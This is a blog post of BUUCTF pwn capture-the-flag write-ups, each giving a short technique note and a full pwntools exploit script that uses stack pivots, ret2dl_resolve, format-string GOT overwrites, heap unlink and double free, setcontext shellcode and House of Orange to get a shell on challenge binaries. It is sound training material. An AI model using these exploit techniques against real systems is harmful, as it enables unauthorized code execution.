BUUCTF pwn 五月刷题

最新推荐文章于 2024-09-27 13:29:48 发布
最新推荐文章于 2024-09-27 13:29:48 发布
阅读量736 收藏
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_38419913/article/details/105913911
版权

actf_2019_babystack

典型的stack pivot,告诉了输入时候栈的地址,我们可以通过伪造ebp,通过两次leave将esp指向开始时候的栈地址。注意的是这里system("/bin/sh")有问题,换了one gadget才成功,不是很清楚为什么。

from pwn import *

context.log_level = "debug"
context.terminal = ["/usr/bin/tmux", "splitw", "-h", "-p", "70"]

#io = process("./pwn")
io = remote("node3.buuoj.cn", 25533)
e = ELF("./pwn")
libc = ELF("/lib/x86_64-linux-gnu/libc-2.27.so")

def debug(command=None):
	if command:
		gdb.attach(io, command)
	else:
		gdb.attach(io)

pop_rdi_ret = 0x400ad3
leave_ret = 0x400A18

io.recvuntil(">")
io.sendline(str(0xE0))
io.recvuntil("at ")
stack_addr = int(io.recvuntil("\n")[:-1], 16)
log.success("stack addr: "+hex(stack_addr))

payload = "a"*0x8
payload += p64(pop_rdi_ret)
payload += p64(e.got["puts"])
payload += p64(e.plt["puts"])
payload += p64(0x400800)
payload = payload.ljust(0xD0, "a")
payload += p64(stack_addr)
payload += p64(leave_ret)

io.send(payload)
io.recvuntil("Byebye~\n")
libc_address = u64(io.recv(6).ljust(8, "\x00")) - libc.symbols["puts"]
log.success("libc addr: "+hex(libc_address))

bin_sh_addr = libc_address + libc.search("/bin/sh").next()
system_addr = libc_address + libc.symbols["system"]

sleep(4)

io.recvuntil(">")
io.sendline(str(0xE0))
io.recvuntil("at ")
stack_addr = int(io.recvuntil("\n")[:-1], 16)
log.success("stack addr: "+hex(stack_addr))

#debug()
'''
0x4f2c5 execve("/bin/sh", rsp+0x40, environ)
constraints:
  rcx == NULL

0x4f322 execve("/bin/sh", rsp+0x40, environ)
constraints:
  [rsp+0x40] == NULL

0x10a38c execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL
'''

one_gadget = libc_address + 0x4f2c5

payload = "a"*0x8
payload += p64(one_gadget)
payload = payload.ljust(0xD0, "a")
payload += p64(stack_addr)
payload += p64(leave_ret)
io.send(payload)

io.interactive()

cscctf_2019_qual_babystack

栈溢出,并且没有write/puts函数,典型的ret2dl_runtime_resolve,借助roputils工具

from pwn import *
import roputils

context.log_level = "DEBUG"
context.terminal = ["/usr/bin/tmux", "splitw", "-h", "-p", "70"]

io = remote("node3.buuoj.cn", 29286)
#io = process("./pwn")
e = ELF("./pwn")

def debug():
	gdb.attach(io)


rop = roputils.ROP("./pwn")
bss_addr = rop.section(".bss")
log.success("bss addr:" + hex(bss_addr))

vul_func = 0x08048456

payload = "a"*20
payload += p32(e.plt["read"])
payload += p32(vul_func)
payload += p32(0x0)
payload += p32(bss_addr)
payload += p32(100)
io.send(payload)

payload = rop.string("/bin/sh")
payload += rop.fill(20, payload)
payload += rop.dl_resolve_data(bss_addr+20, "system")
payload += rop.fill(100, payload)
io.send(payload)


payload = "a"*20
payload += rop.dl_resolve_call(bss_addr+20, bss_addr)
io.send(payload)

io.interactive()

ciscn_2019_sw_1

printf格式化字符串漏洞实现无限循环

#coding=utf-8
from pwn import *
import roputils

context.log_level = "DEBUG"
context.terminal = ["/usr/bin/tmux", "splitw", "-h", "-p", "70"]

io = remote("node3.buuoj.cn", 29296)
#io = process("./pwn")
e = ELF("./pwn")

fini = 0x804979C
main = 0x8048534
printf_got = 0x0804989C
system_plt = 0x080483D0

offset = 4

payload = p32(fini) 
payload += p32(fini+2) 
payload += p32(printf_got)
payload += p32(printf_got+2)
payload += "%" + str(0x8534-16) + "c%4$hn"
payload += "%" + str(0x10804-0x8534) + "c%5$hn"
payload += "%" + str(0x83D0-0x0804) + "c%6$hn"
payload += "%" + str(0x10804-0x83D0) + "c%7$hn"

print payload
io.send(payload)
sleep(0.2)
io.sendline("/bin/sh")

io.interactive()

jarvisoj_level6_x64

漏洞点在可以多次free,因为堆块均大于fastbin,所以利用unlink。

#coding=utf-8
from pwn import *

context.log_level = "DEBUG"
context.terminal = ["/usr/bin/tmux", "splitw", "-h", "-p", "70"]

io = remote("node3.buuoj.cn", 27605)
#io = process("./pwn")
e = ELF("./pwn")
libc = ELF("libc-2.23.so")
# libc = ELF("/lib/i386-linux-gnu/libc-2.23.so")

gdb_script = '''
			set $ptr=(void **)0x0804A2EC
			define pr
				x/20gx $ptr
			end
			'''

def debug(command=None):
	if command:
		gdb.attach(io, command)
	else:
		gdb.attach(io)

def list_note():
	io.recvuntil("choice: ")
	io.sendline("1")

def new(size, content):
	io.recvuntil("choice: ")
	io.sendline("2")
	io.recvuntil("new note: ")
	io.sendline(str(size))
	io.recvuntil("your note: ")
	io.send(content)

def edit(index, size, content):
	io.recvuntil("choice: ")
	io.sendline("3")
	io.recvuntil("number: ")
	io.sendline(str(index))
	io.recvuntil("note: ")
	io.sendline(str(size))
	io.recvuntil("note: ")
	io.send(content)

def delete(index):
	io.recvuntil("choice: ")
	io.sendline("4")
	io.recvuntil("number: ")
	io.sendline(str(index))


new(0x80, "a"*0x80)	#0
new(0x80, "a"*0x80)	#1
new(0x80, "a"*0x80)	#2
new(0x80, "a"*0x80)	#3
new(0x80, "a"*0x80)	#4

delete(0)
delete(2)

new(4, "aaaa")	#0
new(4, "aaaa")	#1

#leak heap and libc
list_note()
io.recvuntil("0. aaaa")
heap_addr = u32(io.recv(4)) - 0xd28
io.recvuntil("2. aaaa")
malloc_hook = u32(io.recv(4)) - 0x30 - 0x18
libc_addr = malloc_hook - libc.symbols['__malloc_hook']
log.success("heap addr: " + hex(heap_addr))
log.success("libc addr: " + hex(libc_addr))

delete(0)
delete(1)

note0 = heap_addr + 0x18 
payload = p32(0x0)			#pre size
payload += p32(0x81)		#size
payload += p32(note0-4*3)	#fd
payload += p32(note0-4*2)	#bk
payload = payload.ljust(0x80, "\x00")
payload += p32(0x80)	#pre size
payload += p32(0x88)	#size(inuse bit=0)

#unlink
new(len(payload), payload)
delete(1)h

payload = p32(0x2)
payload += p32(0x1)
payload += p32(0x4)
payload += p32(e.got["strtol"])
payload = payload.ljust(0x88, "\x00")

edit(0, 0x88, payload)

system_addr = libc_addr + libc.symbols["system"]
edit(0, 0x4, p32(system_addr))

#new(0x80, "/bin/sh\x00".ljust(0x80, "\x00"))

#debug()
io.sendline("/bin/sh")

io.interactive()

jarvisoj_itemboard

堆和栈溢出的结合

#coding=utf-8
from pwn import *

context.log_level = "DEBUG"
context.terminal = ["/usr/bin/tmux", "splitw", "-h", "-p", "70"]

#io = remote("node3.buuoj.cn", 29472)
io = process("./pwn")
e = ELF("./pwn")
libc = ELF("/lib/x86_64-linux-gnu/libc-2.23.so")
#libc = ELF("libc-2.23.so")


gdb_script = '''
			set $ptr=(void **)$rebase(0x202080)
			define pr
				x/20gx ptr
			end
			'''

def debug(command=None):
	if command:
		gdb.attach(io, command)
	else:
		gdb.attach(io)

def add(name, size, description):
	io.recvuntil("choose:\n")
	io.sendline("1")
	io.recvuntil("?\n")
	io.send(name)
	io.recvuntil("?\n")
	io.sendline(str(size))
	io.recvuntil("?\n")
	io.send(description)

def show(index):
	io.recvuntil("choose:\n")
	io.sendline("3")
	io.recvuntil("?\n")
	io.sendline(str(index))

def delete(index):
	io.recvuntil("choose:\n")
	io.sendline("4")
	io.recvuntil("?\n")
	io.sendline(str(index))

#leak libc, heap
add("a\n", 0x80, "b\n")	#0
add("a\n", 0x10, "b\n")	#1
add("a\n", 0x80, "b\n")	#2
add("a\n", 0x10, "b\n")	#3

delete(0)
delete(2)

show(0)
io.recvuntil("Description:")
malloc_hook = u64(io.recv(6).ljust(8, "\x00")) - 88 - 0x10
libc_addr = malloc_hook - libc.symbols["__malloc_hook"]
log.success("libc addr: " + hex(libc_addr))


show(2)
io.recvuntil("Description:")
heap_addr = u64(io.recv(6).ljust(8, "\x00")) - 0x510
log.success("heap addr: " + hex(heap_addr))

pop_rdi_ret = libc_addr + 0x21102
bin_sh_addr = libc_addr + libc.search("/bin/sh").next()
system_addr = libc_addr + libc.symbols["system"]
free_hook= libc_addr + libc.symbols["__free_hook"]
log.success("system addr: " + hex(system_addr))
log.success("free_hook addr: " + hex(free_hook))
#stack overflow
add("a\n", 0x80, "b\n")	#4
add("a\n", 0x80, "b\n")	#5
add("a\n", 0x40, "a"*0x8+p64(free_hook)+"\n")	#6


#debug("b *$rebase(0xCB1)")	

payload = p64(system_addr)
payload += "a"*0x400
payload += p64(heap_addr+0x7c0)

add("/bin/sh\n", len(payload)+0x10, payload+"\n")	#7
delete(7)

#debug()	

io.interactive()

ciscn_2019_final_4

做了一种非预期解,控制free hook,直接走setcontext扩大控制流

#coding=utf-8
from pwn import *

#context.log_level = "DEBUG"
context.terminal = ["/usr/bin/tmux", "splitw", "-h", "-p", "70"]
context.arch = "amd64"

#io = process("./pwn_patch")
io = remote("node3.buuoj.cn", 29771)
e = ELF("./pwn")
libc = ELF("/lib/x86_64-linux-gnu/libc-2.23.so")

gdb_script = '''
			b *0x400C11
			set $ptr=(void **)0x6020c0
			define pr
				x/20gx $ptr
			end
			'''

def debug(command=None):
	if command:
		gdb.attach(io, command)
	else:
		gdb.attach(io)

def add(size, content):
	io.recvuntil(">> ")
	io.sendline("1")
	io.recvuntil("size?\n")
	io.sendline(str(size))
	io.recvuntil("content?\n")
	io.send(content)

def delete(index):
	io.recvuntil(">> ")
	io.sendline("2")
	io.recvuntil("index ?\n")
	io.sendline(str(index))

def show(index):
	io.recvuntil(">> ")
	io.sendline("3")
	io.recvuntil("index ?\n")
	io.sendline(str(index))

io.recvuntil("? \n")
io.sendline("coco")

# leak libc and heap
add(0x100, "a")	#0
add(0x10, "a")	#1
add(0x100, "a")	#2
add(0x10, "a")	#3

delete(2)
delete(0)

# fd->0->2->unsorted_bin
show(2)
malloc_hook = u64(io.recv(6).ljust(8, "\x00")) - 88 -0x10
libc_addr = malloc_hook - libc.symbols["__malloc_hook"]
log.success("libc addr: " + hex(libc_addr))
show(0)
heap_addr = u64(io.recvuntil("\n")[:-1].ljust(8, "\x00")) - 0xb0 - 0x80
log.success("heap addr: " + hex(heap_addr))
free_hook = libc_addr + libc.symbols["__free_hook"]
setcontext_gadget = libc_addr + 0x47b75
setcontext_ret = libc_addr + 0x47bbf 

heap4_content_addr = heap_addr + 0x140
heap5_content_addr = heap_addr + 0x10


payload = "\x00"*0xa0 + p64(heap5_content_addr) + p64(setcontext_ret)
add(0x100, payload)	#4

shellcode = """
			mov rax, 0x67616c662f
			push rax

			mov rdi, 0
			mov rsi, rsp
			mov rdx, 0
			mov rax, SYS_openat
			syscall				;//openat(0, "/flag", 0)

			mov rdi, rax
			mov rsi, rsp
			mov rdx, 0x100		
			mov rax, SYS_read
			syscall				;//read(fp, rsp, 0x100)

			mov rdi, 1
			mov rsi, rsp
			mov rdx, 0x100
			mov rax, SYS_write
			syscall				;//write(1, rsp, 0x100)

			mov rax, SYS_exit
			syscall				;//程序中stdout没有设置不缓冲,所以要exit来fflush stdout缓冲
			"""	
shellcode = asm(shellcode)

payload = p64(libc_addr + 0x21102)	#pop rdi; ret
payload += p64(heap_addr)
payload += p64(libc_addr + 0x1150c9) #pop rdx; pop rsi; ret
payload += p64(0x7)
payload += p64(0x2000)
payload += p64(libc_addr + libc.symbols["mprotect"]) #mprotect(heap_addr, 0x3000, 7)
payload += p64(heap5_content_addr + 0x38)
payload += shellcode

add(0x100, payload)	#5




# hijack free hook
add(0x68, "a")	#6
add(0x68, "a")	#7
delete(6)
delete(7)
delete(6)

malloc_hook_fake_chunk = malloc_hook - 0x23 + 0x18
add(0x68, p64(malloc_hook_fake_chunk))	#8
add(0x68, "a")	#9
add(0x68, "a")	#10


payload = "\x00"*0x1b
payload += p64(0)
payload += p64(0x71)*3
payload += p64(malloc_hook_fake_chunk+0x2b)
add(0x68, payload)	#11
add(0x68, "\x00"*0x38+p64(free_hook-0xb58))	#12


for i in range(0, 17):
	add(0x90, "a")	

add(0x200, "\x00"*0xa8+p64(setcontext_gadget))	#30


#debug(gdb_script)


delete(4)

io.interactive()

houseoforange_hitcon_2016

#coding=utf-8
from pwn import *

context.log_level = "DEBUG"
context.terminal = ["/usr/bin/tmux", "splitw", "-h", "-p", "70"]
context.arch = "amd64"

#io = process("./pwn")
io = remote("node3.buuoj.cn", 27266)
e = ELF("./pwn")
libc = ELF("/lib/x86_64-linux-gnu/libc-2.23.so")

gdb_script = '''
			set $ptr=(void **)$rebase(0x203068)
			define pr
				x/20gx $ptr
			end
			'''

def debug(command=None):
	if command:
		gdb.attach(io, command)
	else:
		gdb.attach(io)

def build(size, content):
	io.recvuntil("choice : ")
	io.sendline("1")
	io.recvuntil("name :")
	io.sendline(str(size))
	io.recvuntil("Name :")
	io.send(content)
	io.recvuntil("Orange:")
	io.sendline("1")
	io.recvuntil("Orange:")
	io.sendline("1")

def see():
	io.recvuntil("choice : ")
	io.sendline("2")

def upgrade(size, content):
	io.recvuntil("choice : ")
	io.sendline("3")
	io.recvuntil("name :")
	io.sendline(str(size))
	io.recvuntil("Name:")
	io.send(content)
	io.recvuntil("Orange: ")
	io.sendline("1")
	io.recvuntil("Orange: ")
	io.sendline("1")

build(0x30, "a")
payload = "a"*0x30
payload += p64(0x0)
payload += p64(0x21)
payload += p64(0x0)*2
payload += p64(0x0)
payload += p64(0xf81)
upgrade(len(payload), payload)

build(0x1000, "a")	#top chunk进入unsorted bin

# leak libc
build(0x400, "a"*8)
see()
io.recvuntil("a"*8)
libc_addr = u64(io.recv(6).ljust(8, "\x00")) - 0x3c5188
log.success("libc addr: " + hex(libc_addr))
# leak heap
upgrade(16, "a"*16)
see()
io.recvuntil("a"*16)
heap_addr = u64(io.recvuntil("\n")[:-1].ljust(8, "\x00")) - 0xe0
log.success("heap addr: " + hex(heap_addr))

_IO_list_all = libc_addr + libc.symbols["_IO_list_all"]
system_addr = libc_addr + libc.symbols["system"]

payload = "a"*0x400
payload += p64(0x0)
payload += p64(0x21)
payload += p64(0x0)*2

fio = "/bin/sh\x00"
fio += p64(0x61)
fio += p64(0x0)
fio += p64(_IO_list_all-0x10)
fio += p64(0x0)	# _IO_write_base
fio += p64(0x1)	# _IO_write_ptr
fio = fio.ljust(0xc0, "\x00")
fio += p64(0x0)	# _mode
fio += p64(0x0)
fio += p64(0x0)
fio += p64(heap_addr + 0x510 + len(fio) + 8)	#vtable ptr
fio += p64(0x0)		#fake vatable addr
fio += p64(0x0)
fio += p64(0x0)
fio += p64(system_addr)
payload += fio


upgrade(len(payload), payload)
#debug(gdb_script)
io.recvuntil("choice : ")
io.sendline("1")	

io.interactive()
coco##
关注
buuctf pwn刷题(1)
清霂的博客
01-30 1207
目录1.test_your_nc2.pwn13.warmup_csaw_2016 1.test_your_nc 先用exeinfo查壳,是64位的程序 用64位ida静态分析一下,找到main函数 F5反汇编,看到system("/bin/sh") system()的作用———执行shell命令也就是向dos发送一条指令。 即执行/bin/sh命令,获得shell权限 用虚拟机连node3.buuoj.cn:27191 nc node3.buuoj.cn 27191 查看文件目录 ls 查看flag
BUUCTF-pwn刷题记录(22-7-30更新)
Morphy_Amo的博客
03-04 4372
BUUCTF刷题记录
Buuctfpwn
qq_53809201的博客
05-07 717
1.pwn1 from pwn import * log_level = 'debug' elf = ELF("./pwn1") local = 0 if local: r = process("./pwn1") else: r = remote("node4.buuoj.cn",29317) bin_sh = 0x000000000040118A system_addr = 0x0000000000401191 payload = b'a'*0x0F + p64(system_addr) +
BUUCTF(PWN)
最新发布
fanshaoze的博客
09-27 646
看到19行,我们知道要输入一个63十进制转换41十六进制的字符长度,然后我们看到atoi知道这里是一个偏移量,804c044开头,我们知道要输入名字的数和密码数一致才能获得flag,这里我们用到了随机生成数。因为前面我们得到了他要输入的偏移量的16进制是41,所以我用AAAA %8x %8x %8x %8x %8x %8x %8x %8x %8x %8x %8x %8x。我们看了main知道了这里存在格式化字符串漏洞,我们只要将判断atoi改成system,手动输入/bin/sh字符串。
BUUCTF PWN
Charles_Andrew的博客
11-21 181
连上,cat flag flag{5885351f-3a2e-4ca2-819f-4b0a42c8f029}
BUUCTF pwn
L0g1c的博客
01-30 1719
第一道: 第一步:连接nc靶场 第二步:连接靶场后,执行 ls 命令,展示该靶场下目录文件。 第三步:里有个 flag文件 使用 cat命令进行查看。 得到flag
BUUCTF-pwn[1]
ca1m4n的博客
10-04 752
PWN手的间歇性记录 ret2text ret2text 首先checksec一下 32位 只开启了栈可执行保护 ida打开 查找/bin/sh binsh = 0x804863A 距离ebp的距离需要利用Ubuntu中gdb工具 gdb ./ret2text 因为存储读入的变量和到栈底的距离未知所以断点下在_gets b *0x80486AE 别忘了再按r,报错不用管 借助变量s到esp的距离计算出s的地址 再计算变量s到esp的距离 用Python: ebp = 0xffffcfd8 e
BUUCTF PWN rip1 WP
m0_54262894的博客
07-31 2646
BUUCTF PWN rip 1 这是一个WP,也是一个自己练习过程的记录。 先把文件放入pwn机中检查一下,发现并没有开启保护,所以应该是一道简单题 我们运行一下试试,它让你输入一段字符然后将字符输出。 把文件放在ida中查看一下 发现main函数并不复杂,只是定义了一个 s ,而且我们很容易就能找到栈溢出的点,我们都知道gets函数是一个危险函数,对于我们来说它可以接受到无限的字符,所以这里就是我们要pwn掉的点。 我们双击 s ,看它有多少空...
BUUCTF PWN-堆题总结 2021-09-27
m0_56897090的博客
09-27 2149
文章目录整体分析-2021-09-27新角度TcacheUAFFile结构体HourseOfForceUnlink经验新角度ciscn_2019_final_5分析EXPTCACHEhitcon_2018_children_tcache分析EXPUAFwustctf2020_easyfast分析EXPACTF_2019_babyheap分析EXPgyctf_2020_some_thing_interesting分析EXPbjdctf_2020_YDSneedGrirlfrien分析EXPciscn_2019
BUUCTF pwn rip
weixin_55190422的博客
11-03 369
现在开始是记录我个人对BUU上PWN题的刷题记录。 首先是一个ELF文件,放到Linux里面来看。 首先老套路checksec一下 接着我们将这个文件放到IDA中静态分析、 shift F12 一下看看敏感字段 我们发现里面有个系统调用函数。我们查看下汇编代码 我们查看Stack of main 视图发现只要存入15个字节就可以返回fun函数 所以payload: from pwn import * p = remote('node4.buuoj.cn',...
buuctfpwn
个人笔记
04-04 3180
一日一PWN/REpwn1_sctf_2016 实践是检验真理的唯一标准。 pwn1_sctf_2016 1.找到漏洞的利用点往往才是困难点。(直接F5看看反汇编) 发现两个可以函数跟进去看看 2.这里对反汇编出来的Vuln理解了半天(本还想从汇编直接分析,不过进展收获不大,欢迎有兴趣的朋友一起交流),下面还是从伪代码分析。 通过这几行能看出最后A变成了B。即把YOU 换成了I。 因为上面是S的溢出点是3C,可fgets之读取了32并不会超过3C,但函数会把一个32个I换成32个YOU就达到了溢出点。 3.
BUUCTF-PWN
weixin_52125240的博客
12-04 2748
BUUCTF-PWN1.test_your_nc2.rip3.warmup_csaw_20164.ciscn_2019_n_15.pwn1_sctf_2016 1.test_your_nc 根据名字的提示,来测试一下我们的nc cat flag 得到我们的flag nc的使用 nc的全名是netcat,其主要用途是建立和监听任意TCP和UDP连接,支持ipv4和ipv6。因此,它可以用来网络调试、端口扫描等等 常用语法: nc [-hlnruz][-g<网关...>][-G<指向器数目&
BUUCTF-pwn(1)
njh18790816639的博客
08-09 1339
test_your_nc
BUUCTFPWN(WP1)
NANMUZN的博客
01-15 711
buuctf pwn
BUUCTF PWN 刷题 1-15题
农夫果园好好喝的博客
08-21 2351
经典栈溢出漏洞。
BUUCTF-pwn(17)
njh18790816639的博客
04-17 689
happytree(SUSCTF) 分析主要函数! 主要三步操作,Insert、Delete、Show函数! 可以看到其为二叉树结构体! 因为全保护开启,故具体思路为泄露地址(heap、libc),然后利用libc2.27版本tcache的double free来修改__free_hook函数为system函数, 此时首先设置基准为0x50,此时分为两部分,左子树用来泄露heap地址并造成double free的效果,右子树来泄露libc地址并申请造成攻击效果! 首先发现可以从0x?0申请到0x?8
buuctf pwn(9~12)
cainiao78777的博客
12-22 269
14但是这样是打不通的两个payload我都调试了一下发现,这个数组的每一个下表对应的区域是一个地址,所以需要借助一下这个p32打包成32位的这样发送出去。
[BUUCTF-pwn]——warmup_csaw_2016
Y_peak的博客
01-30 4342
BUUCTF——warmup_csaw_2016 题目地址:https://buuoj.cn/challenges 题目: 管他三七二十一,先将文件下载下来再说。老规矩,现在Linux上用checksec看看文件。64位,Stack、NX、PIE都没有开,应该是栈溢出的题。 赶快 go go go 去window 上用IDA反汇编看看,看到返回的是gets函数,一个典型的可以利用栈溢出覆盖的地方。其他没什么有用的信息。 按Shift + F12,看一下字符串。不看不知道一看有惊喜。cat flag.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值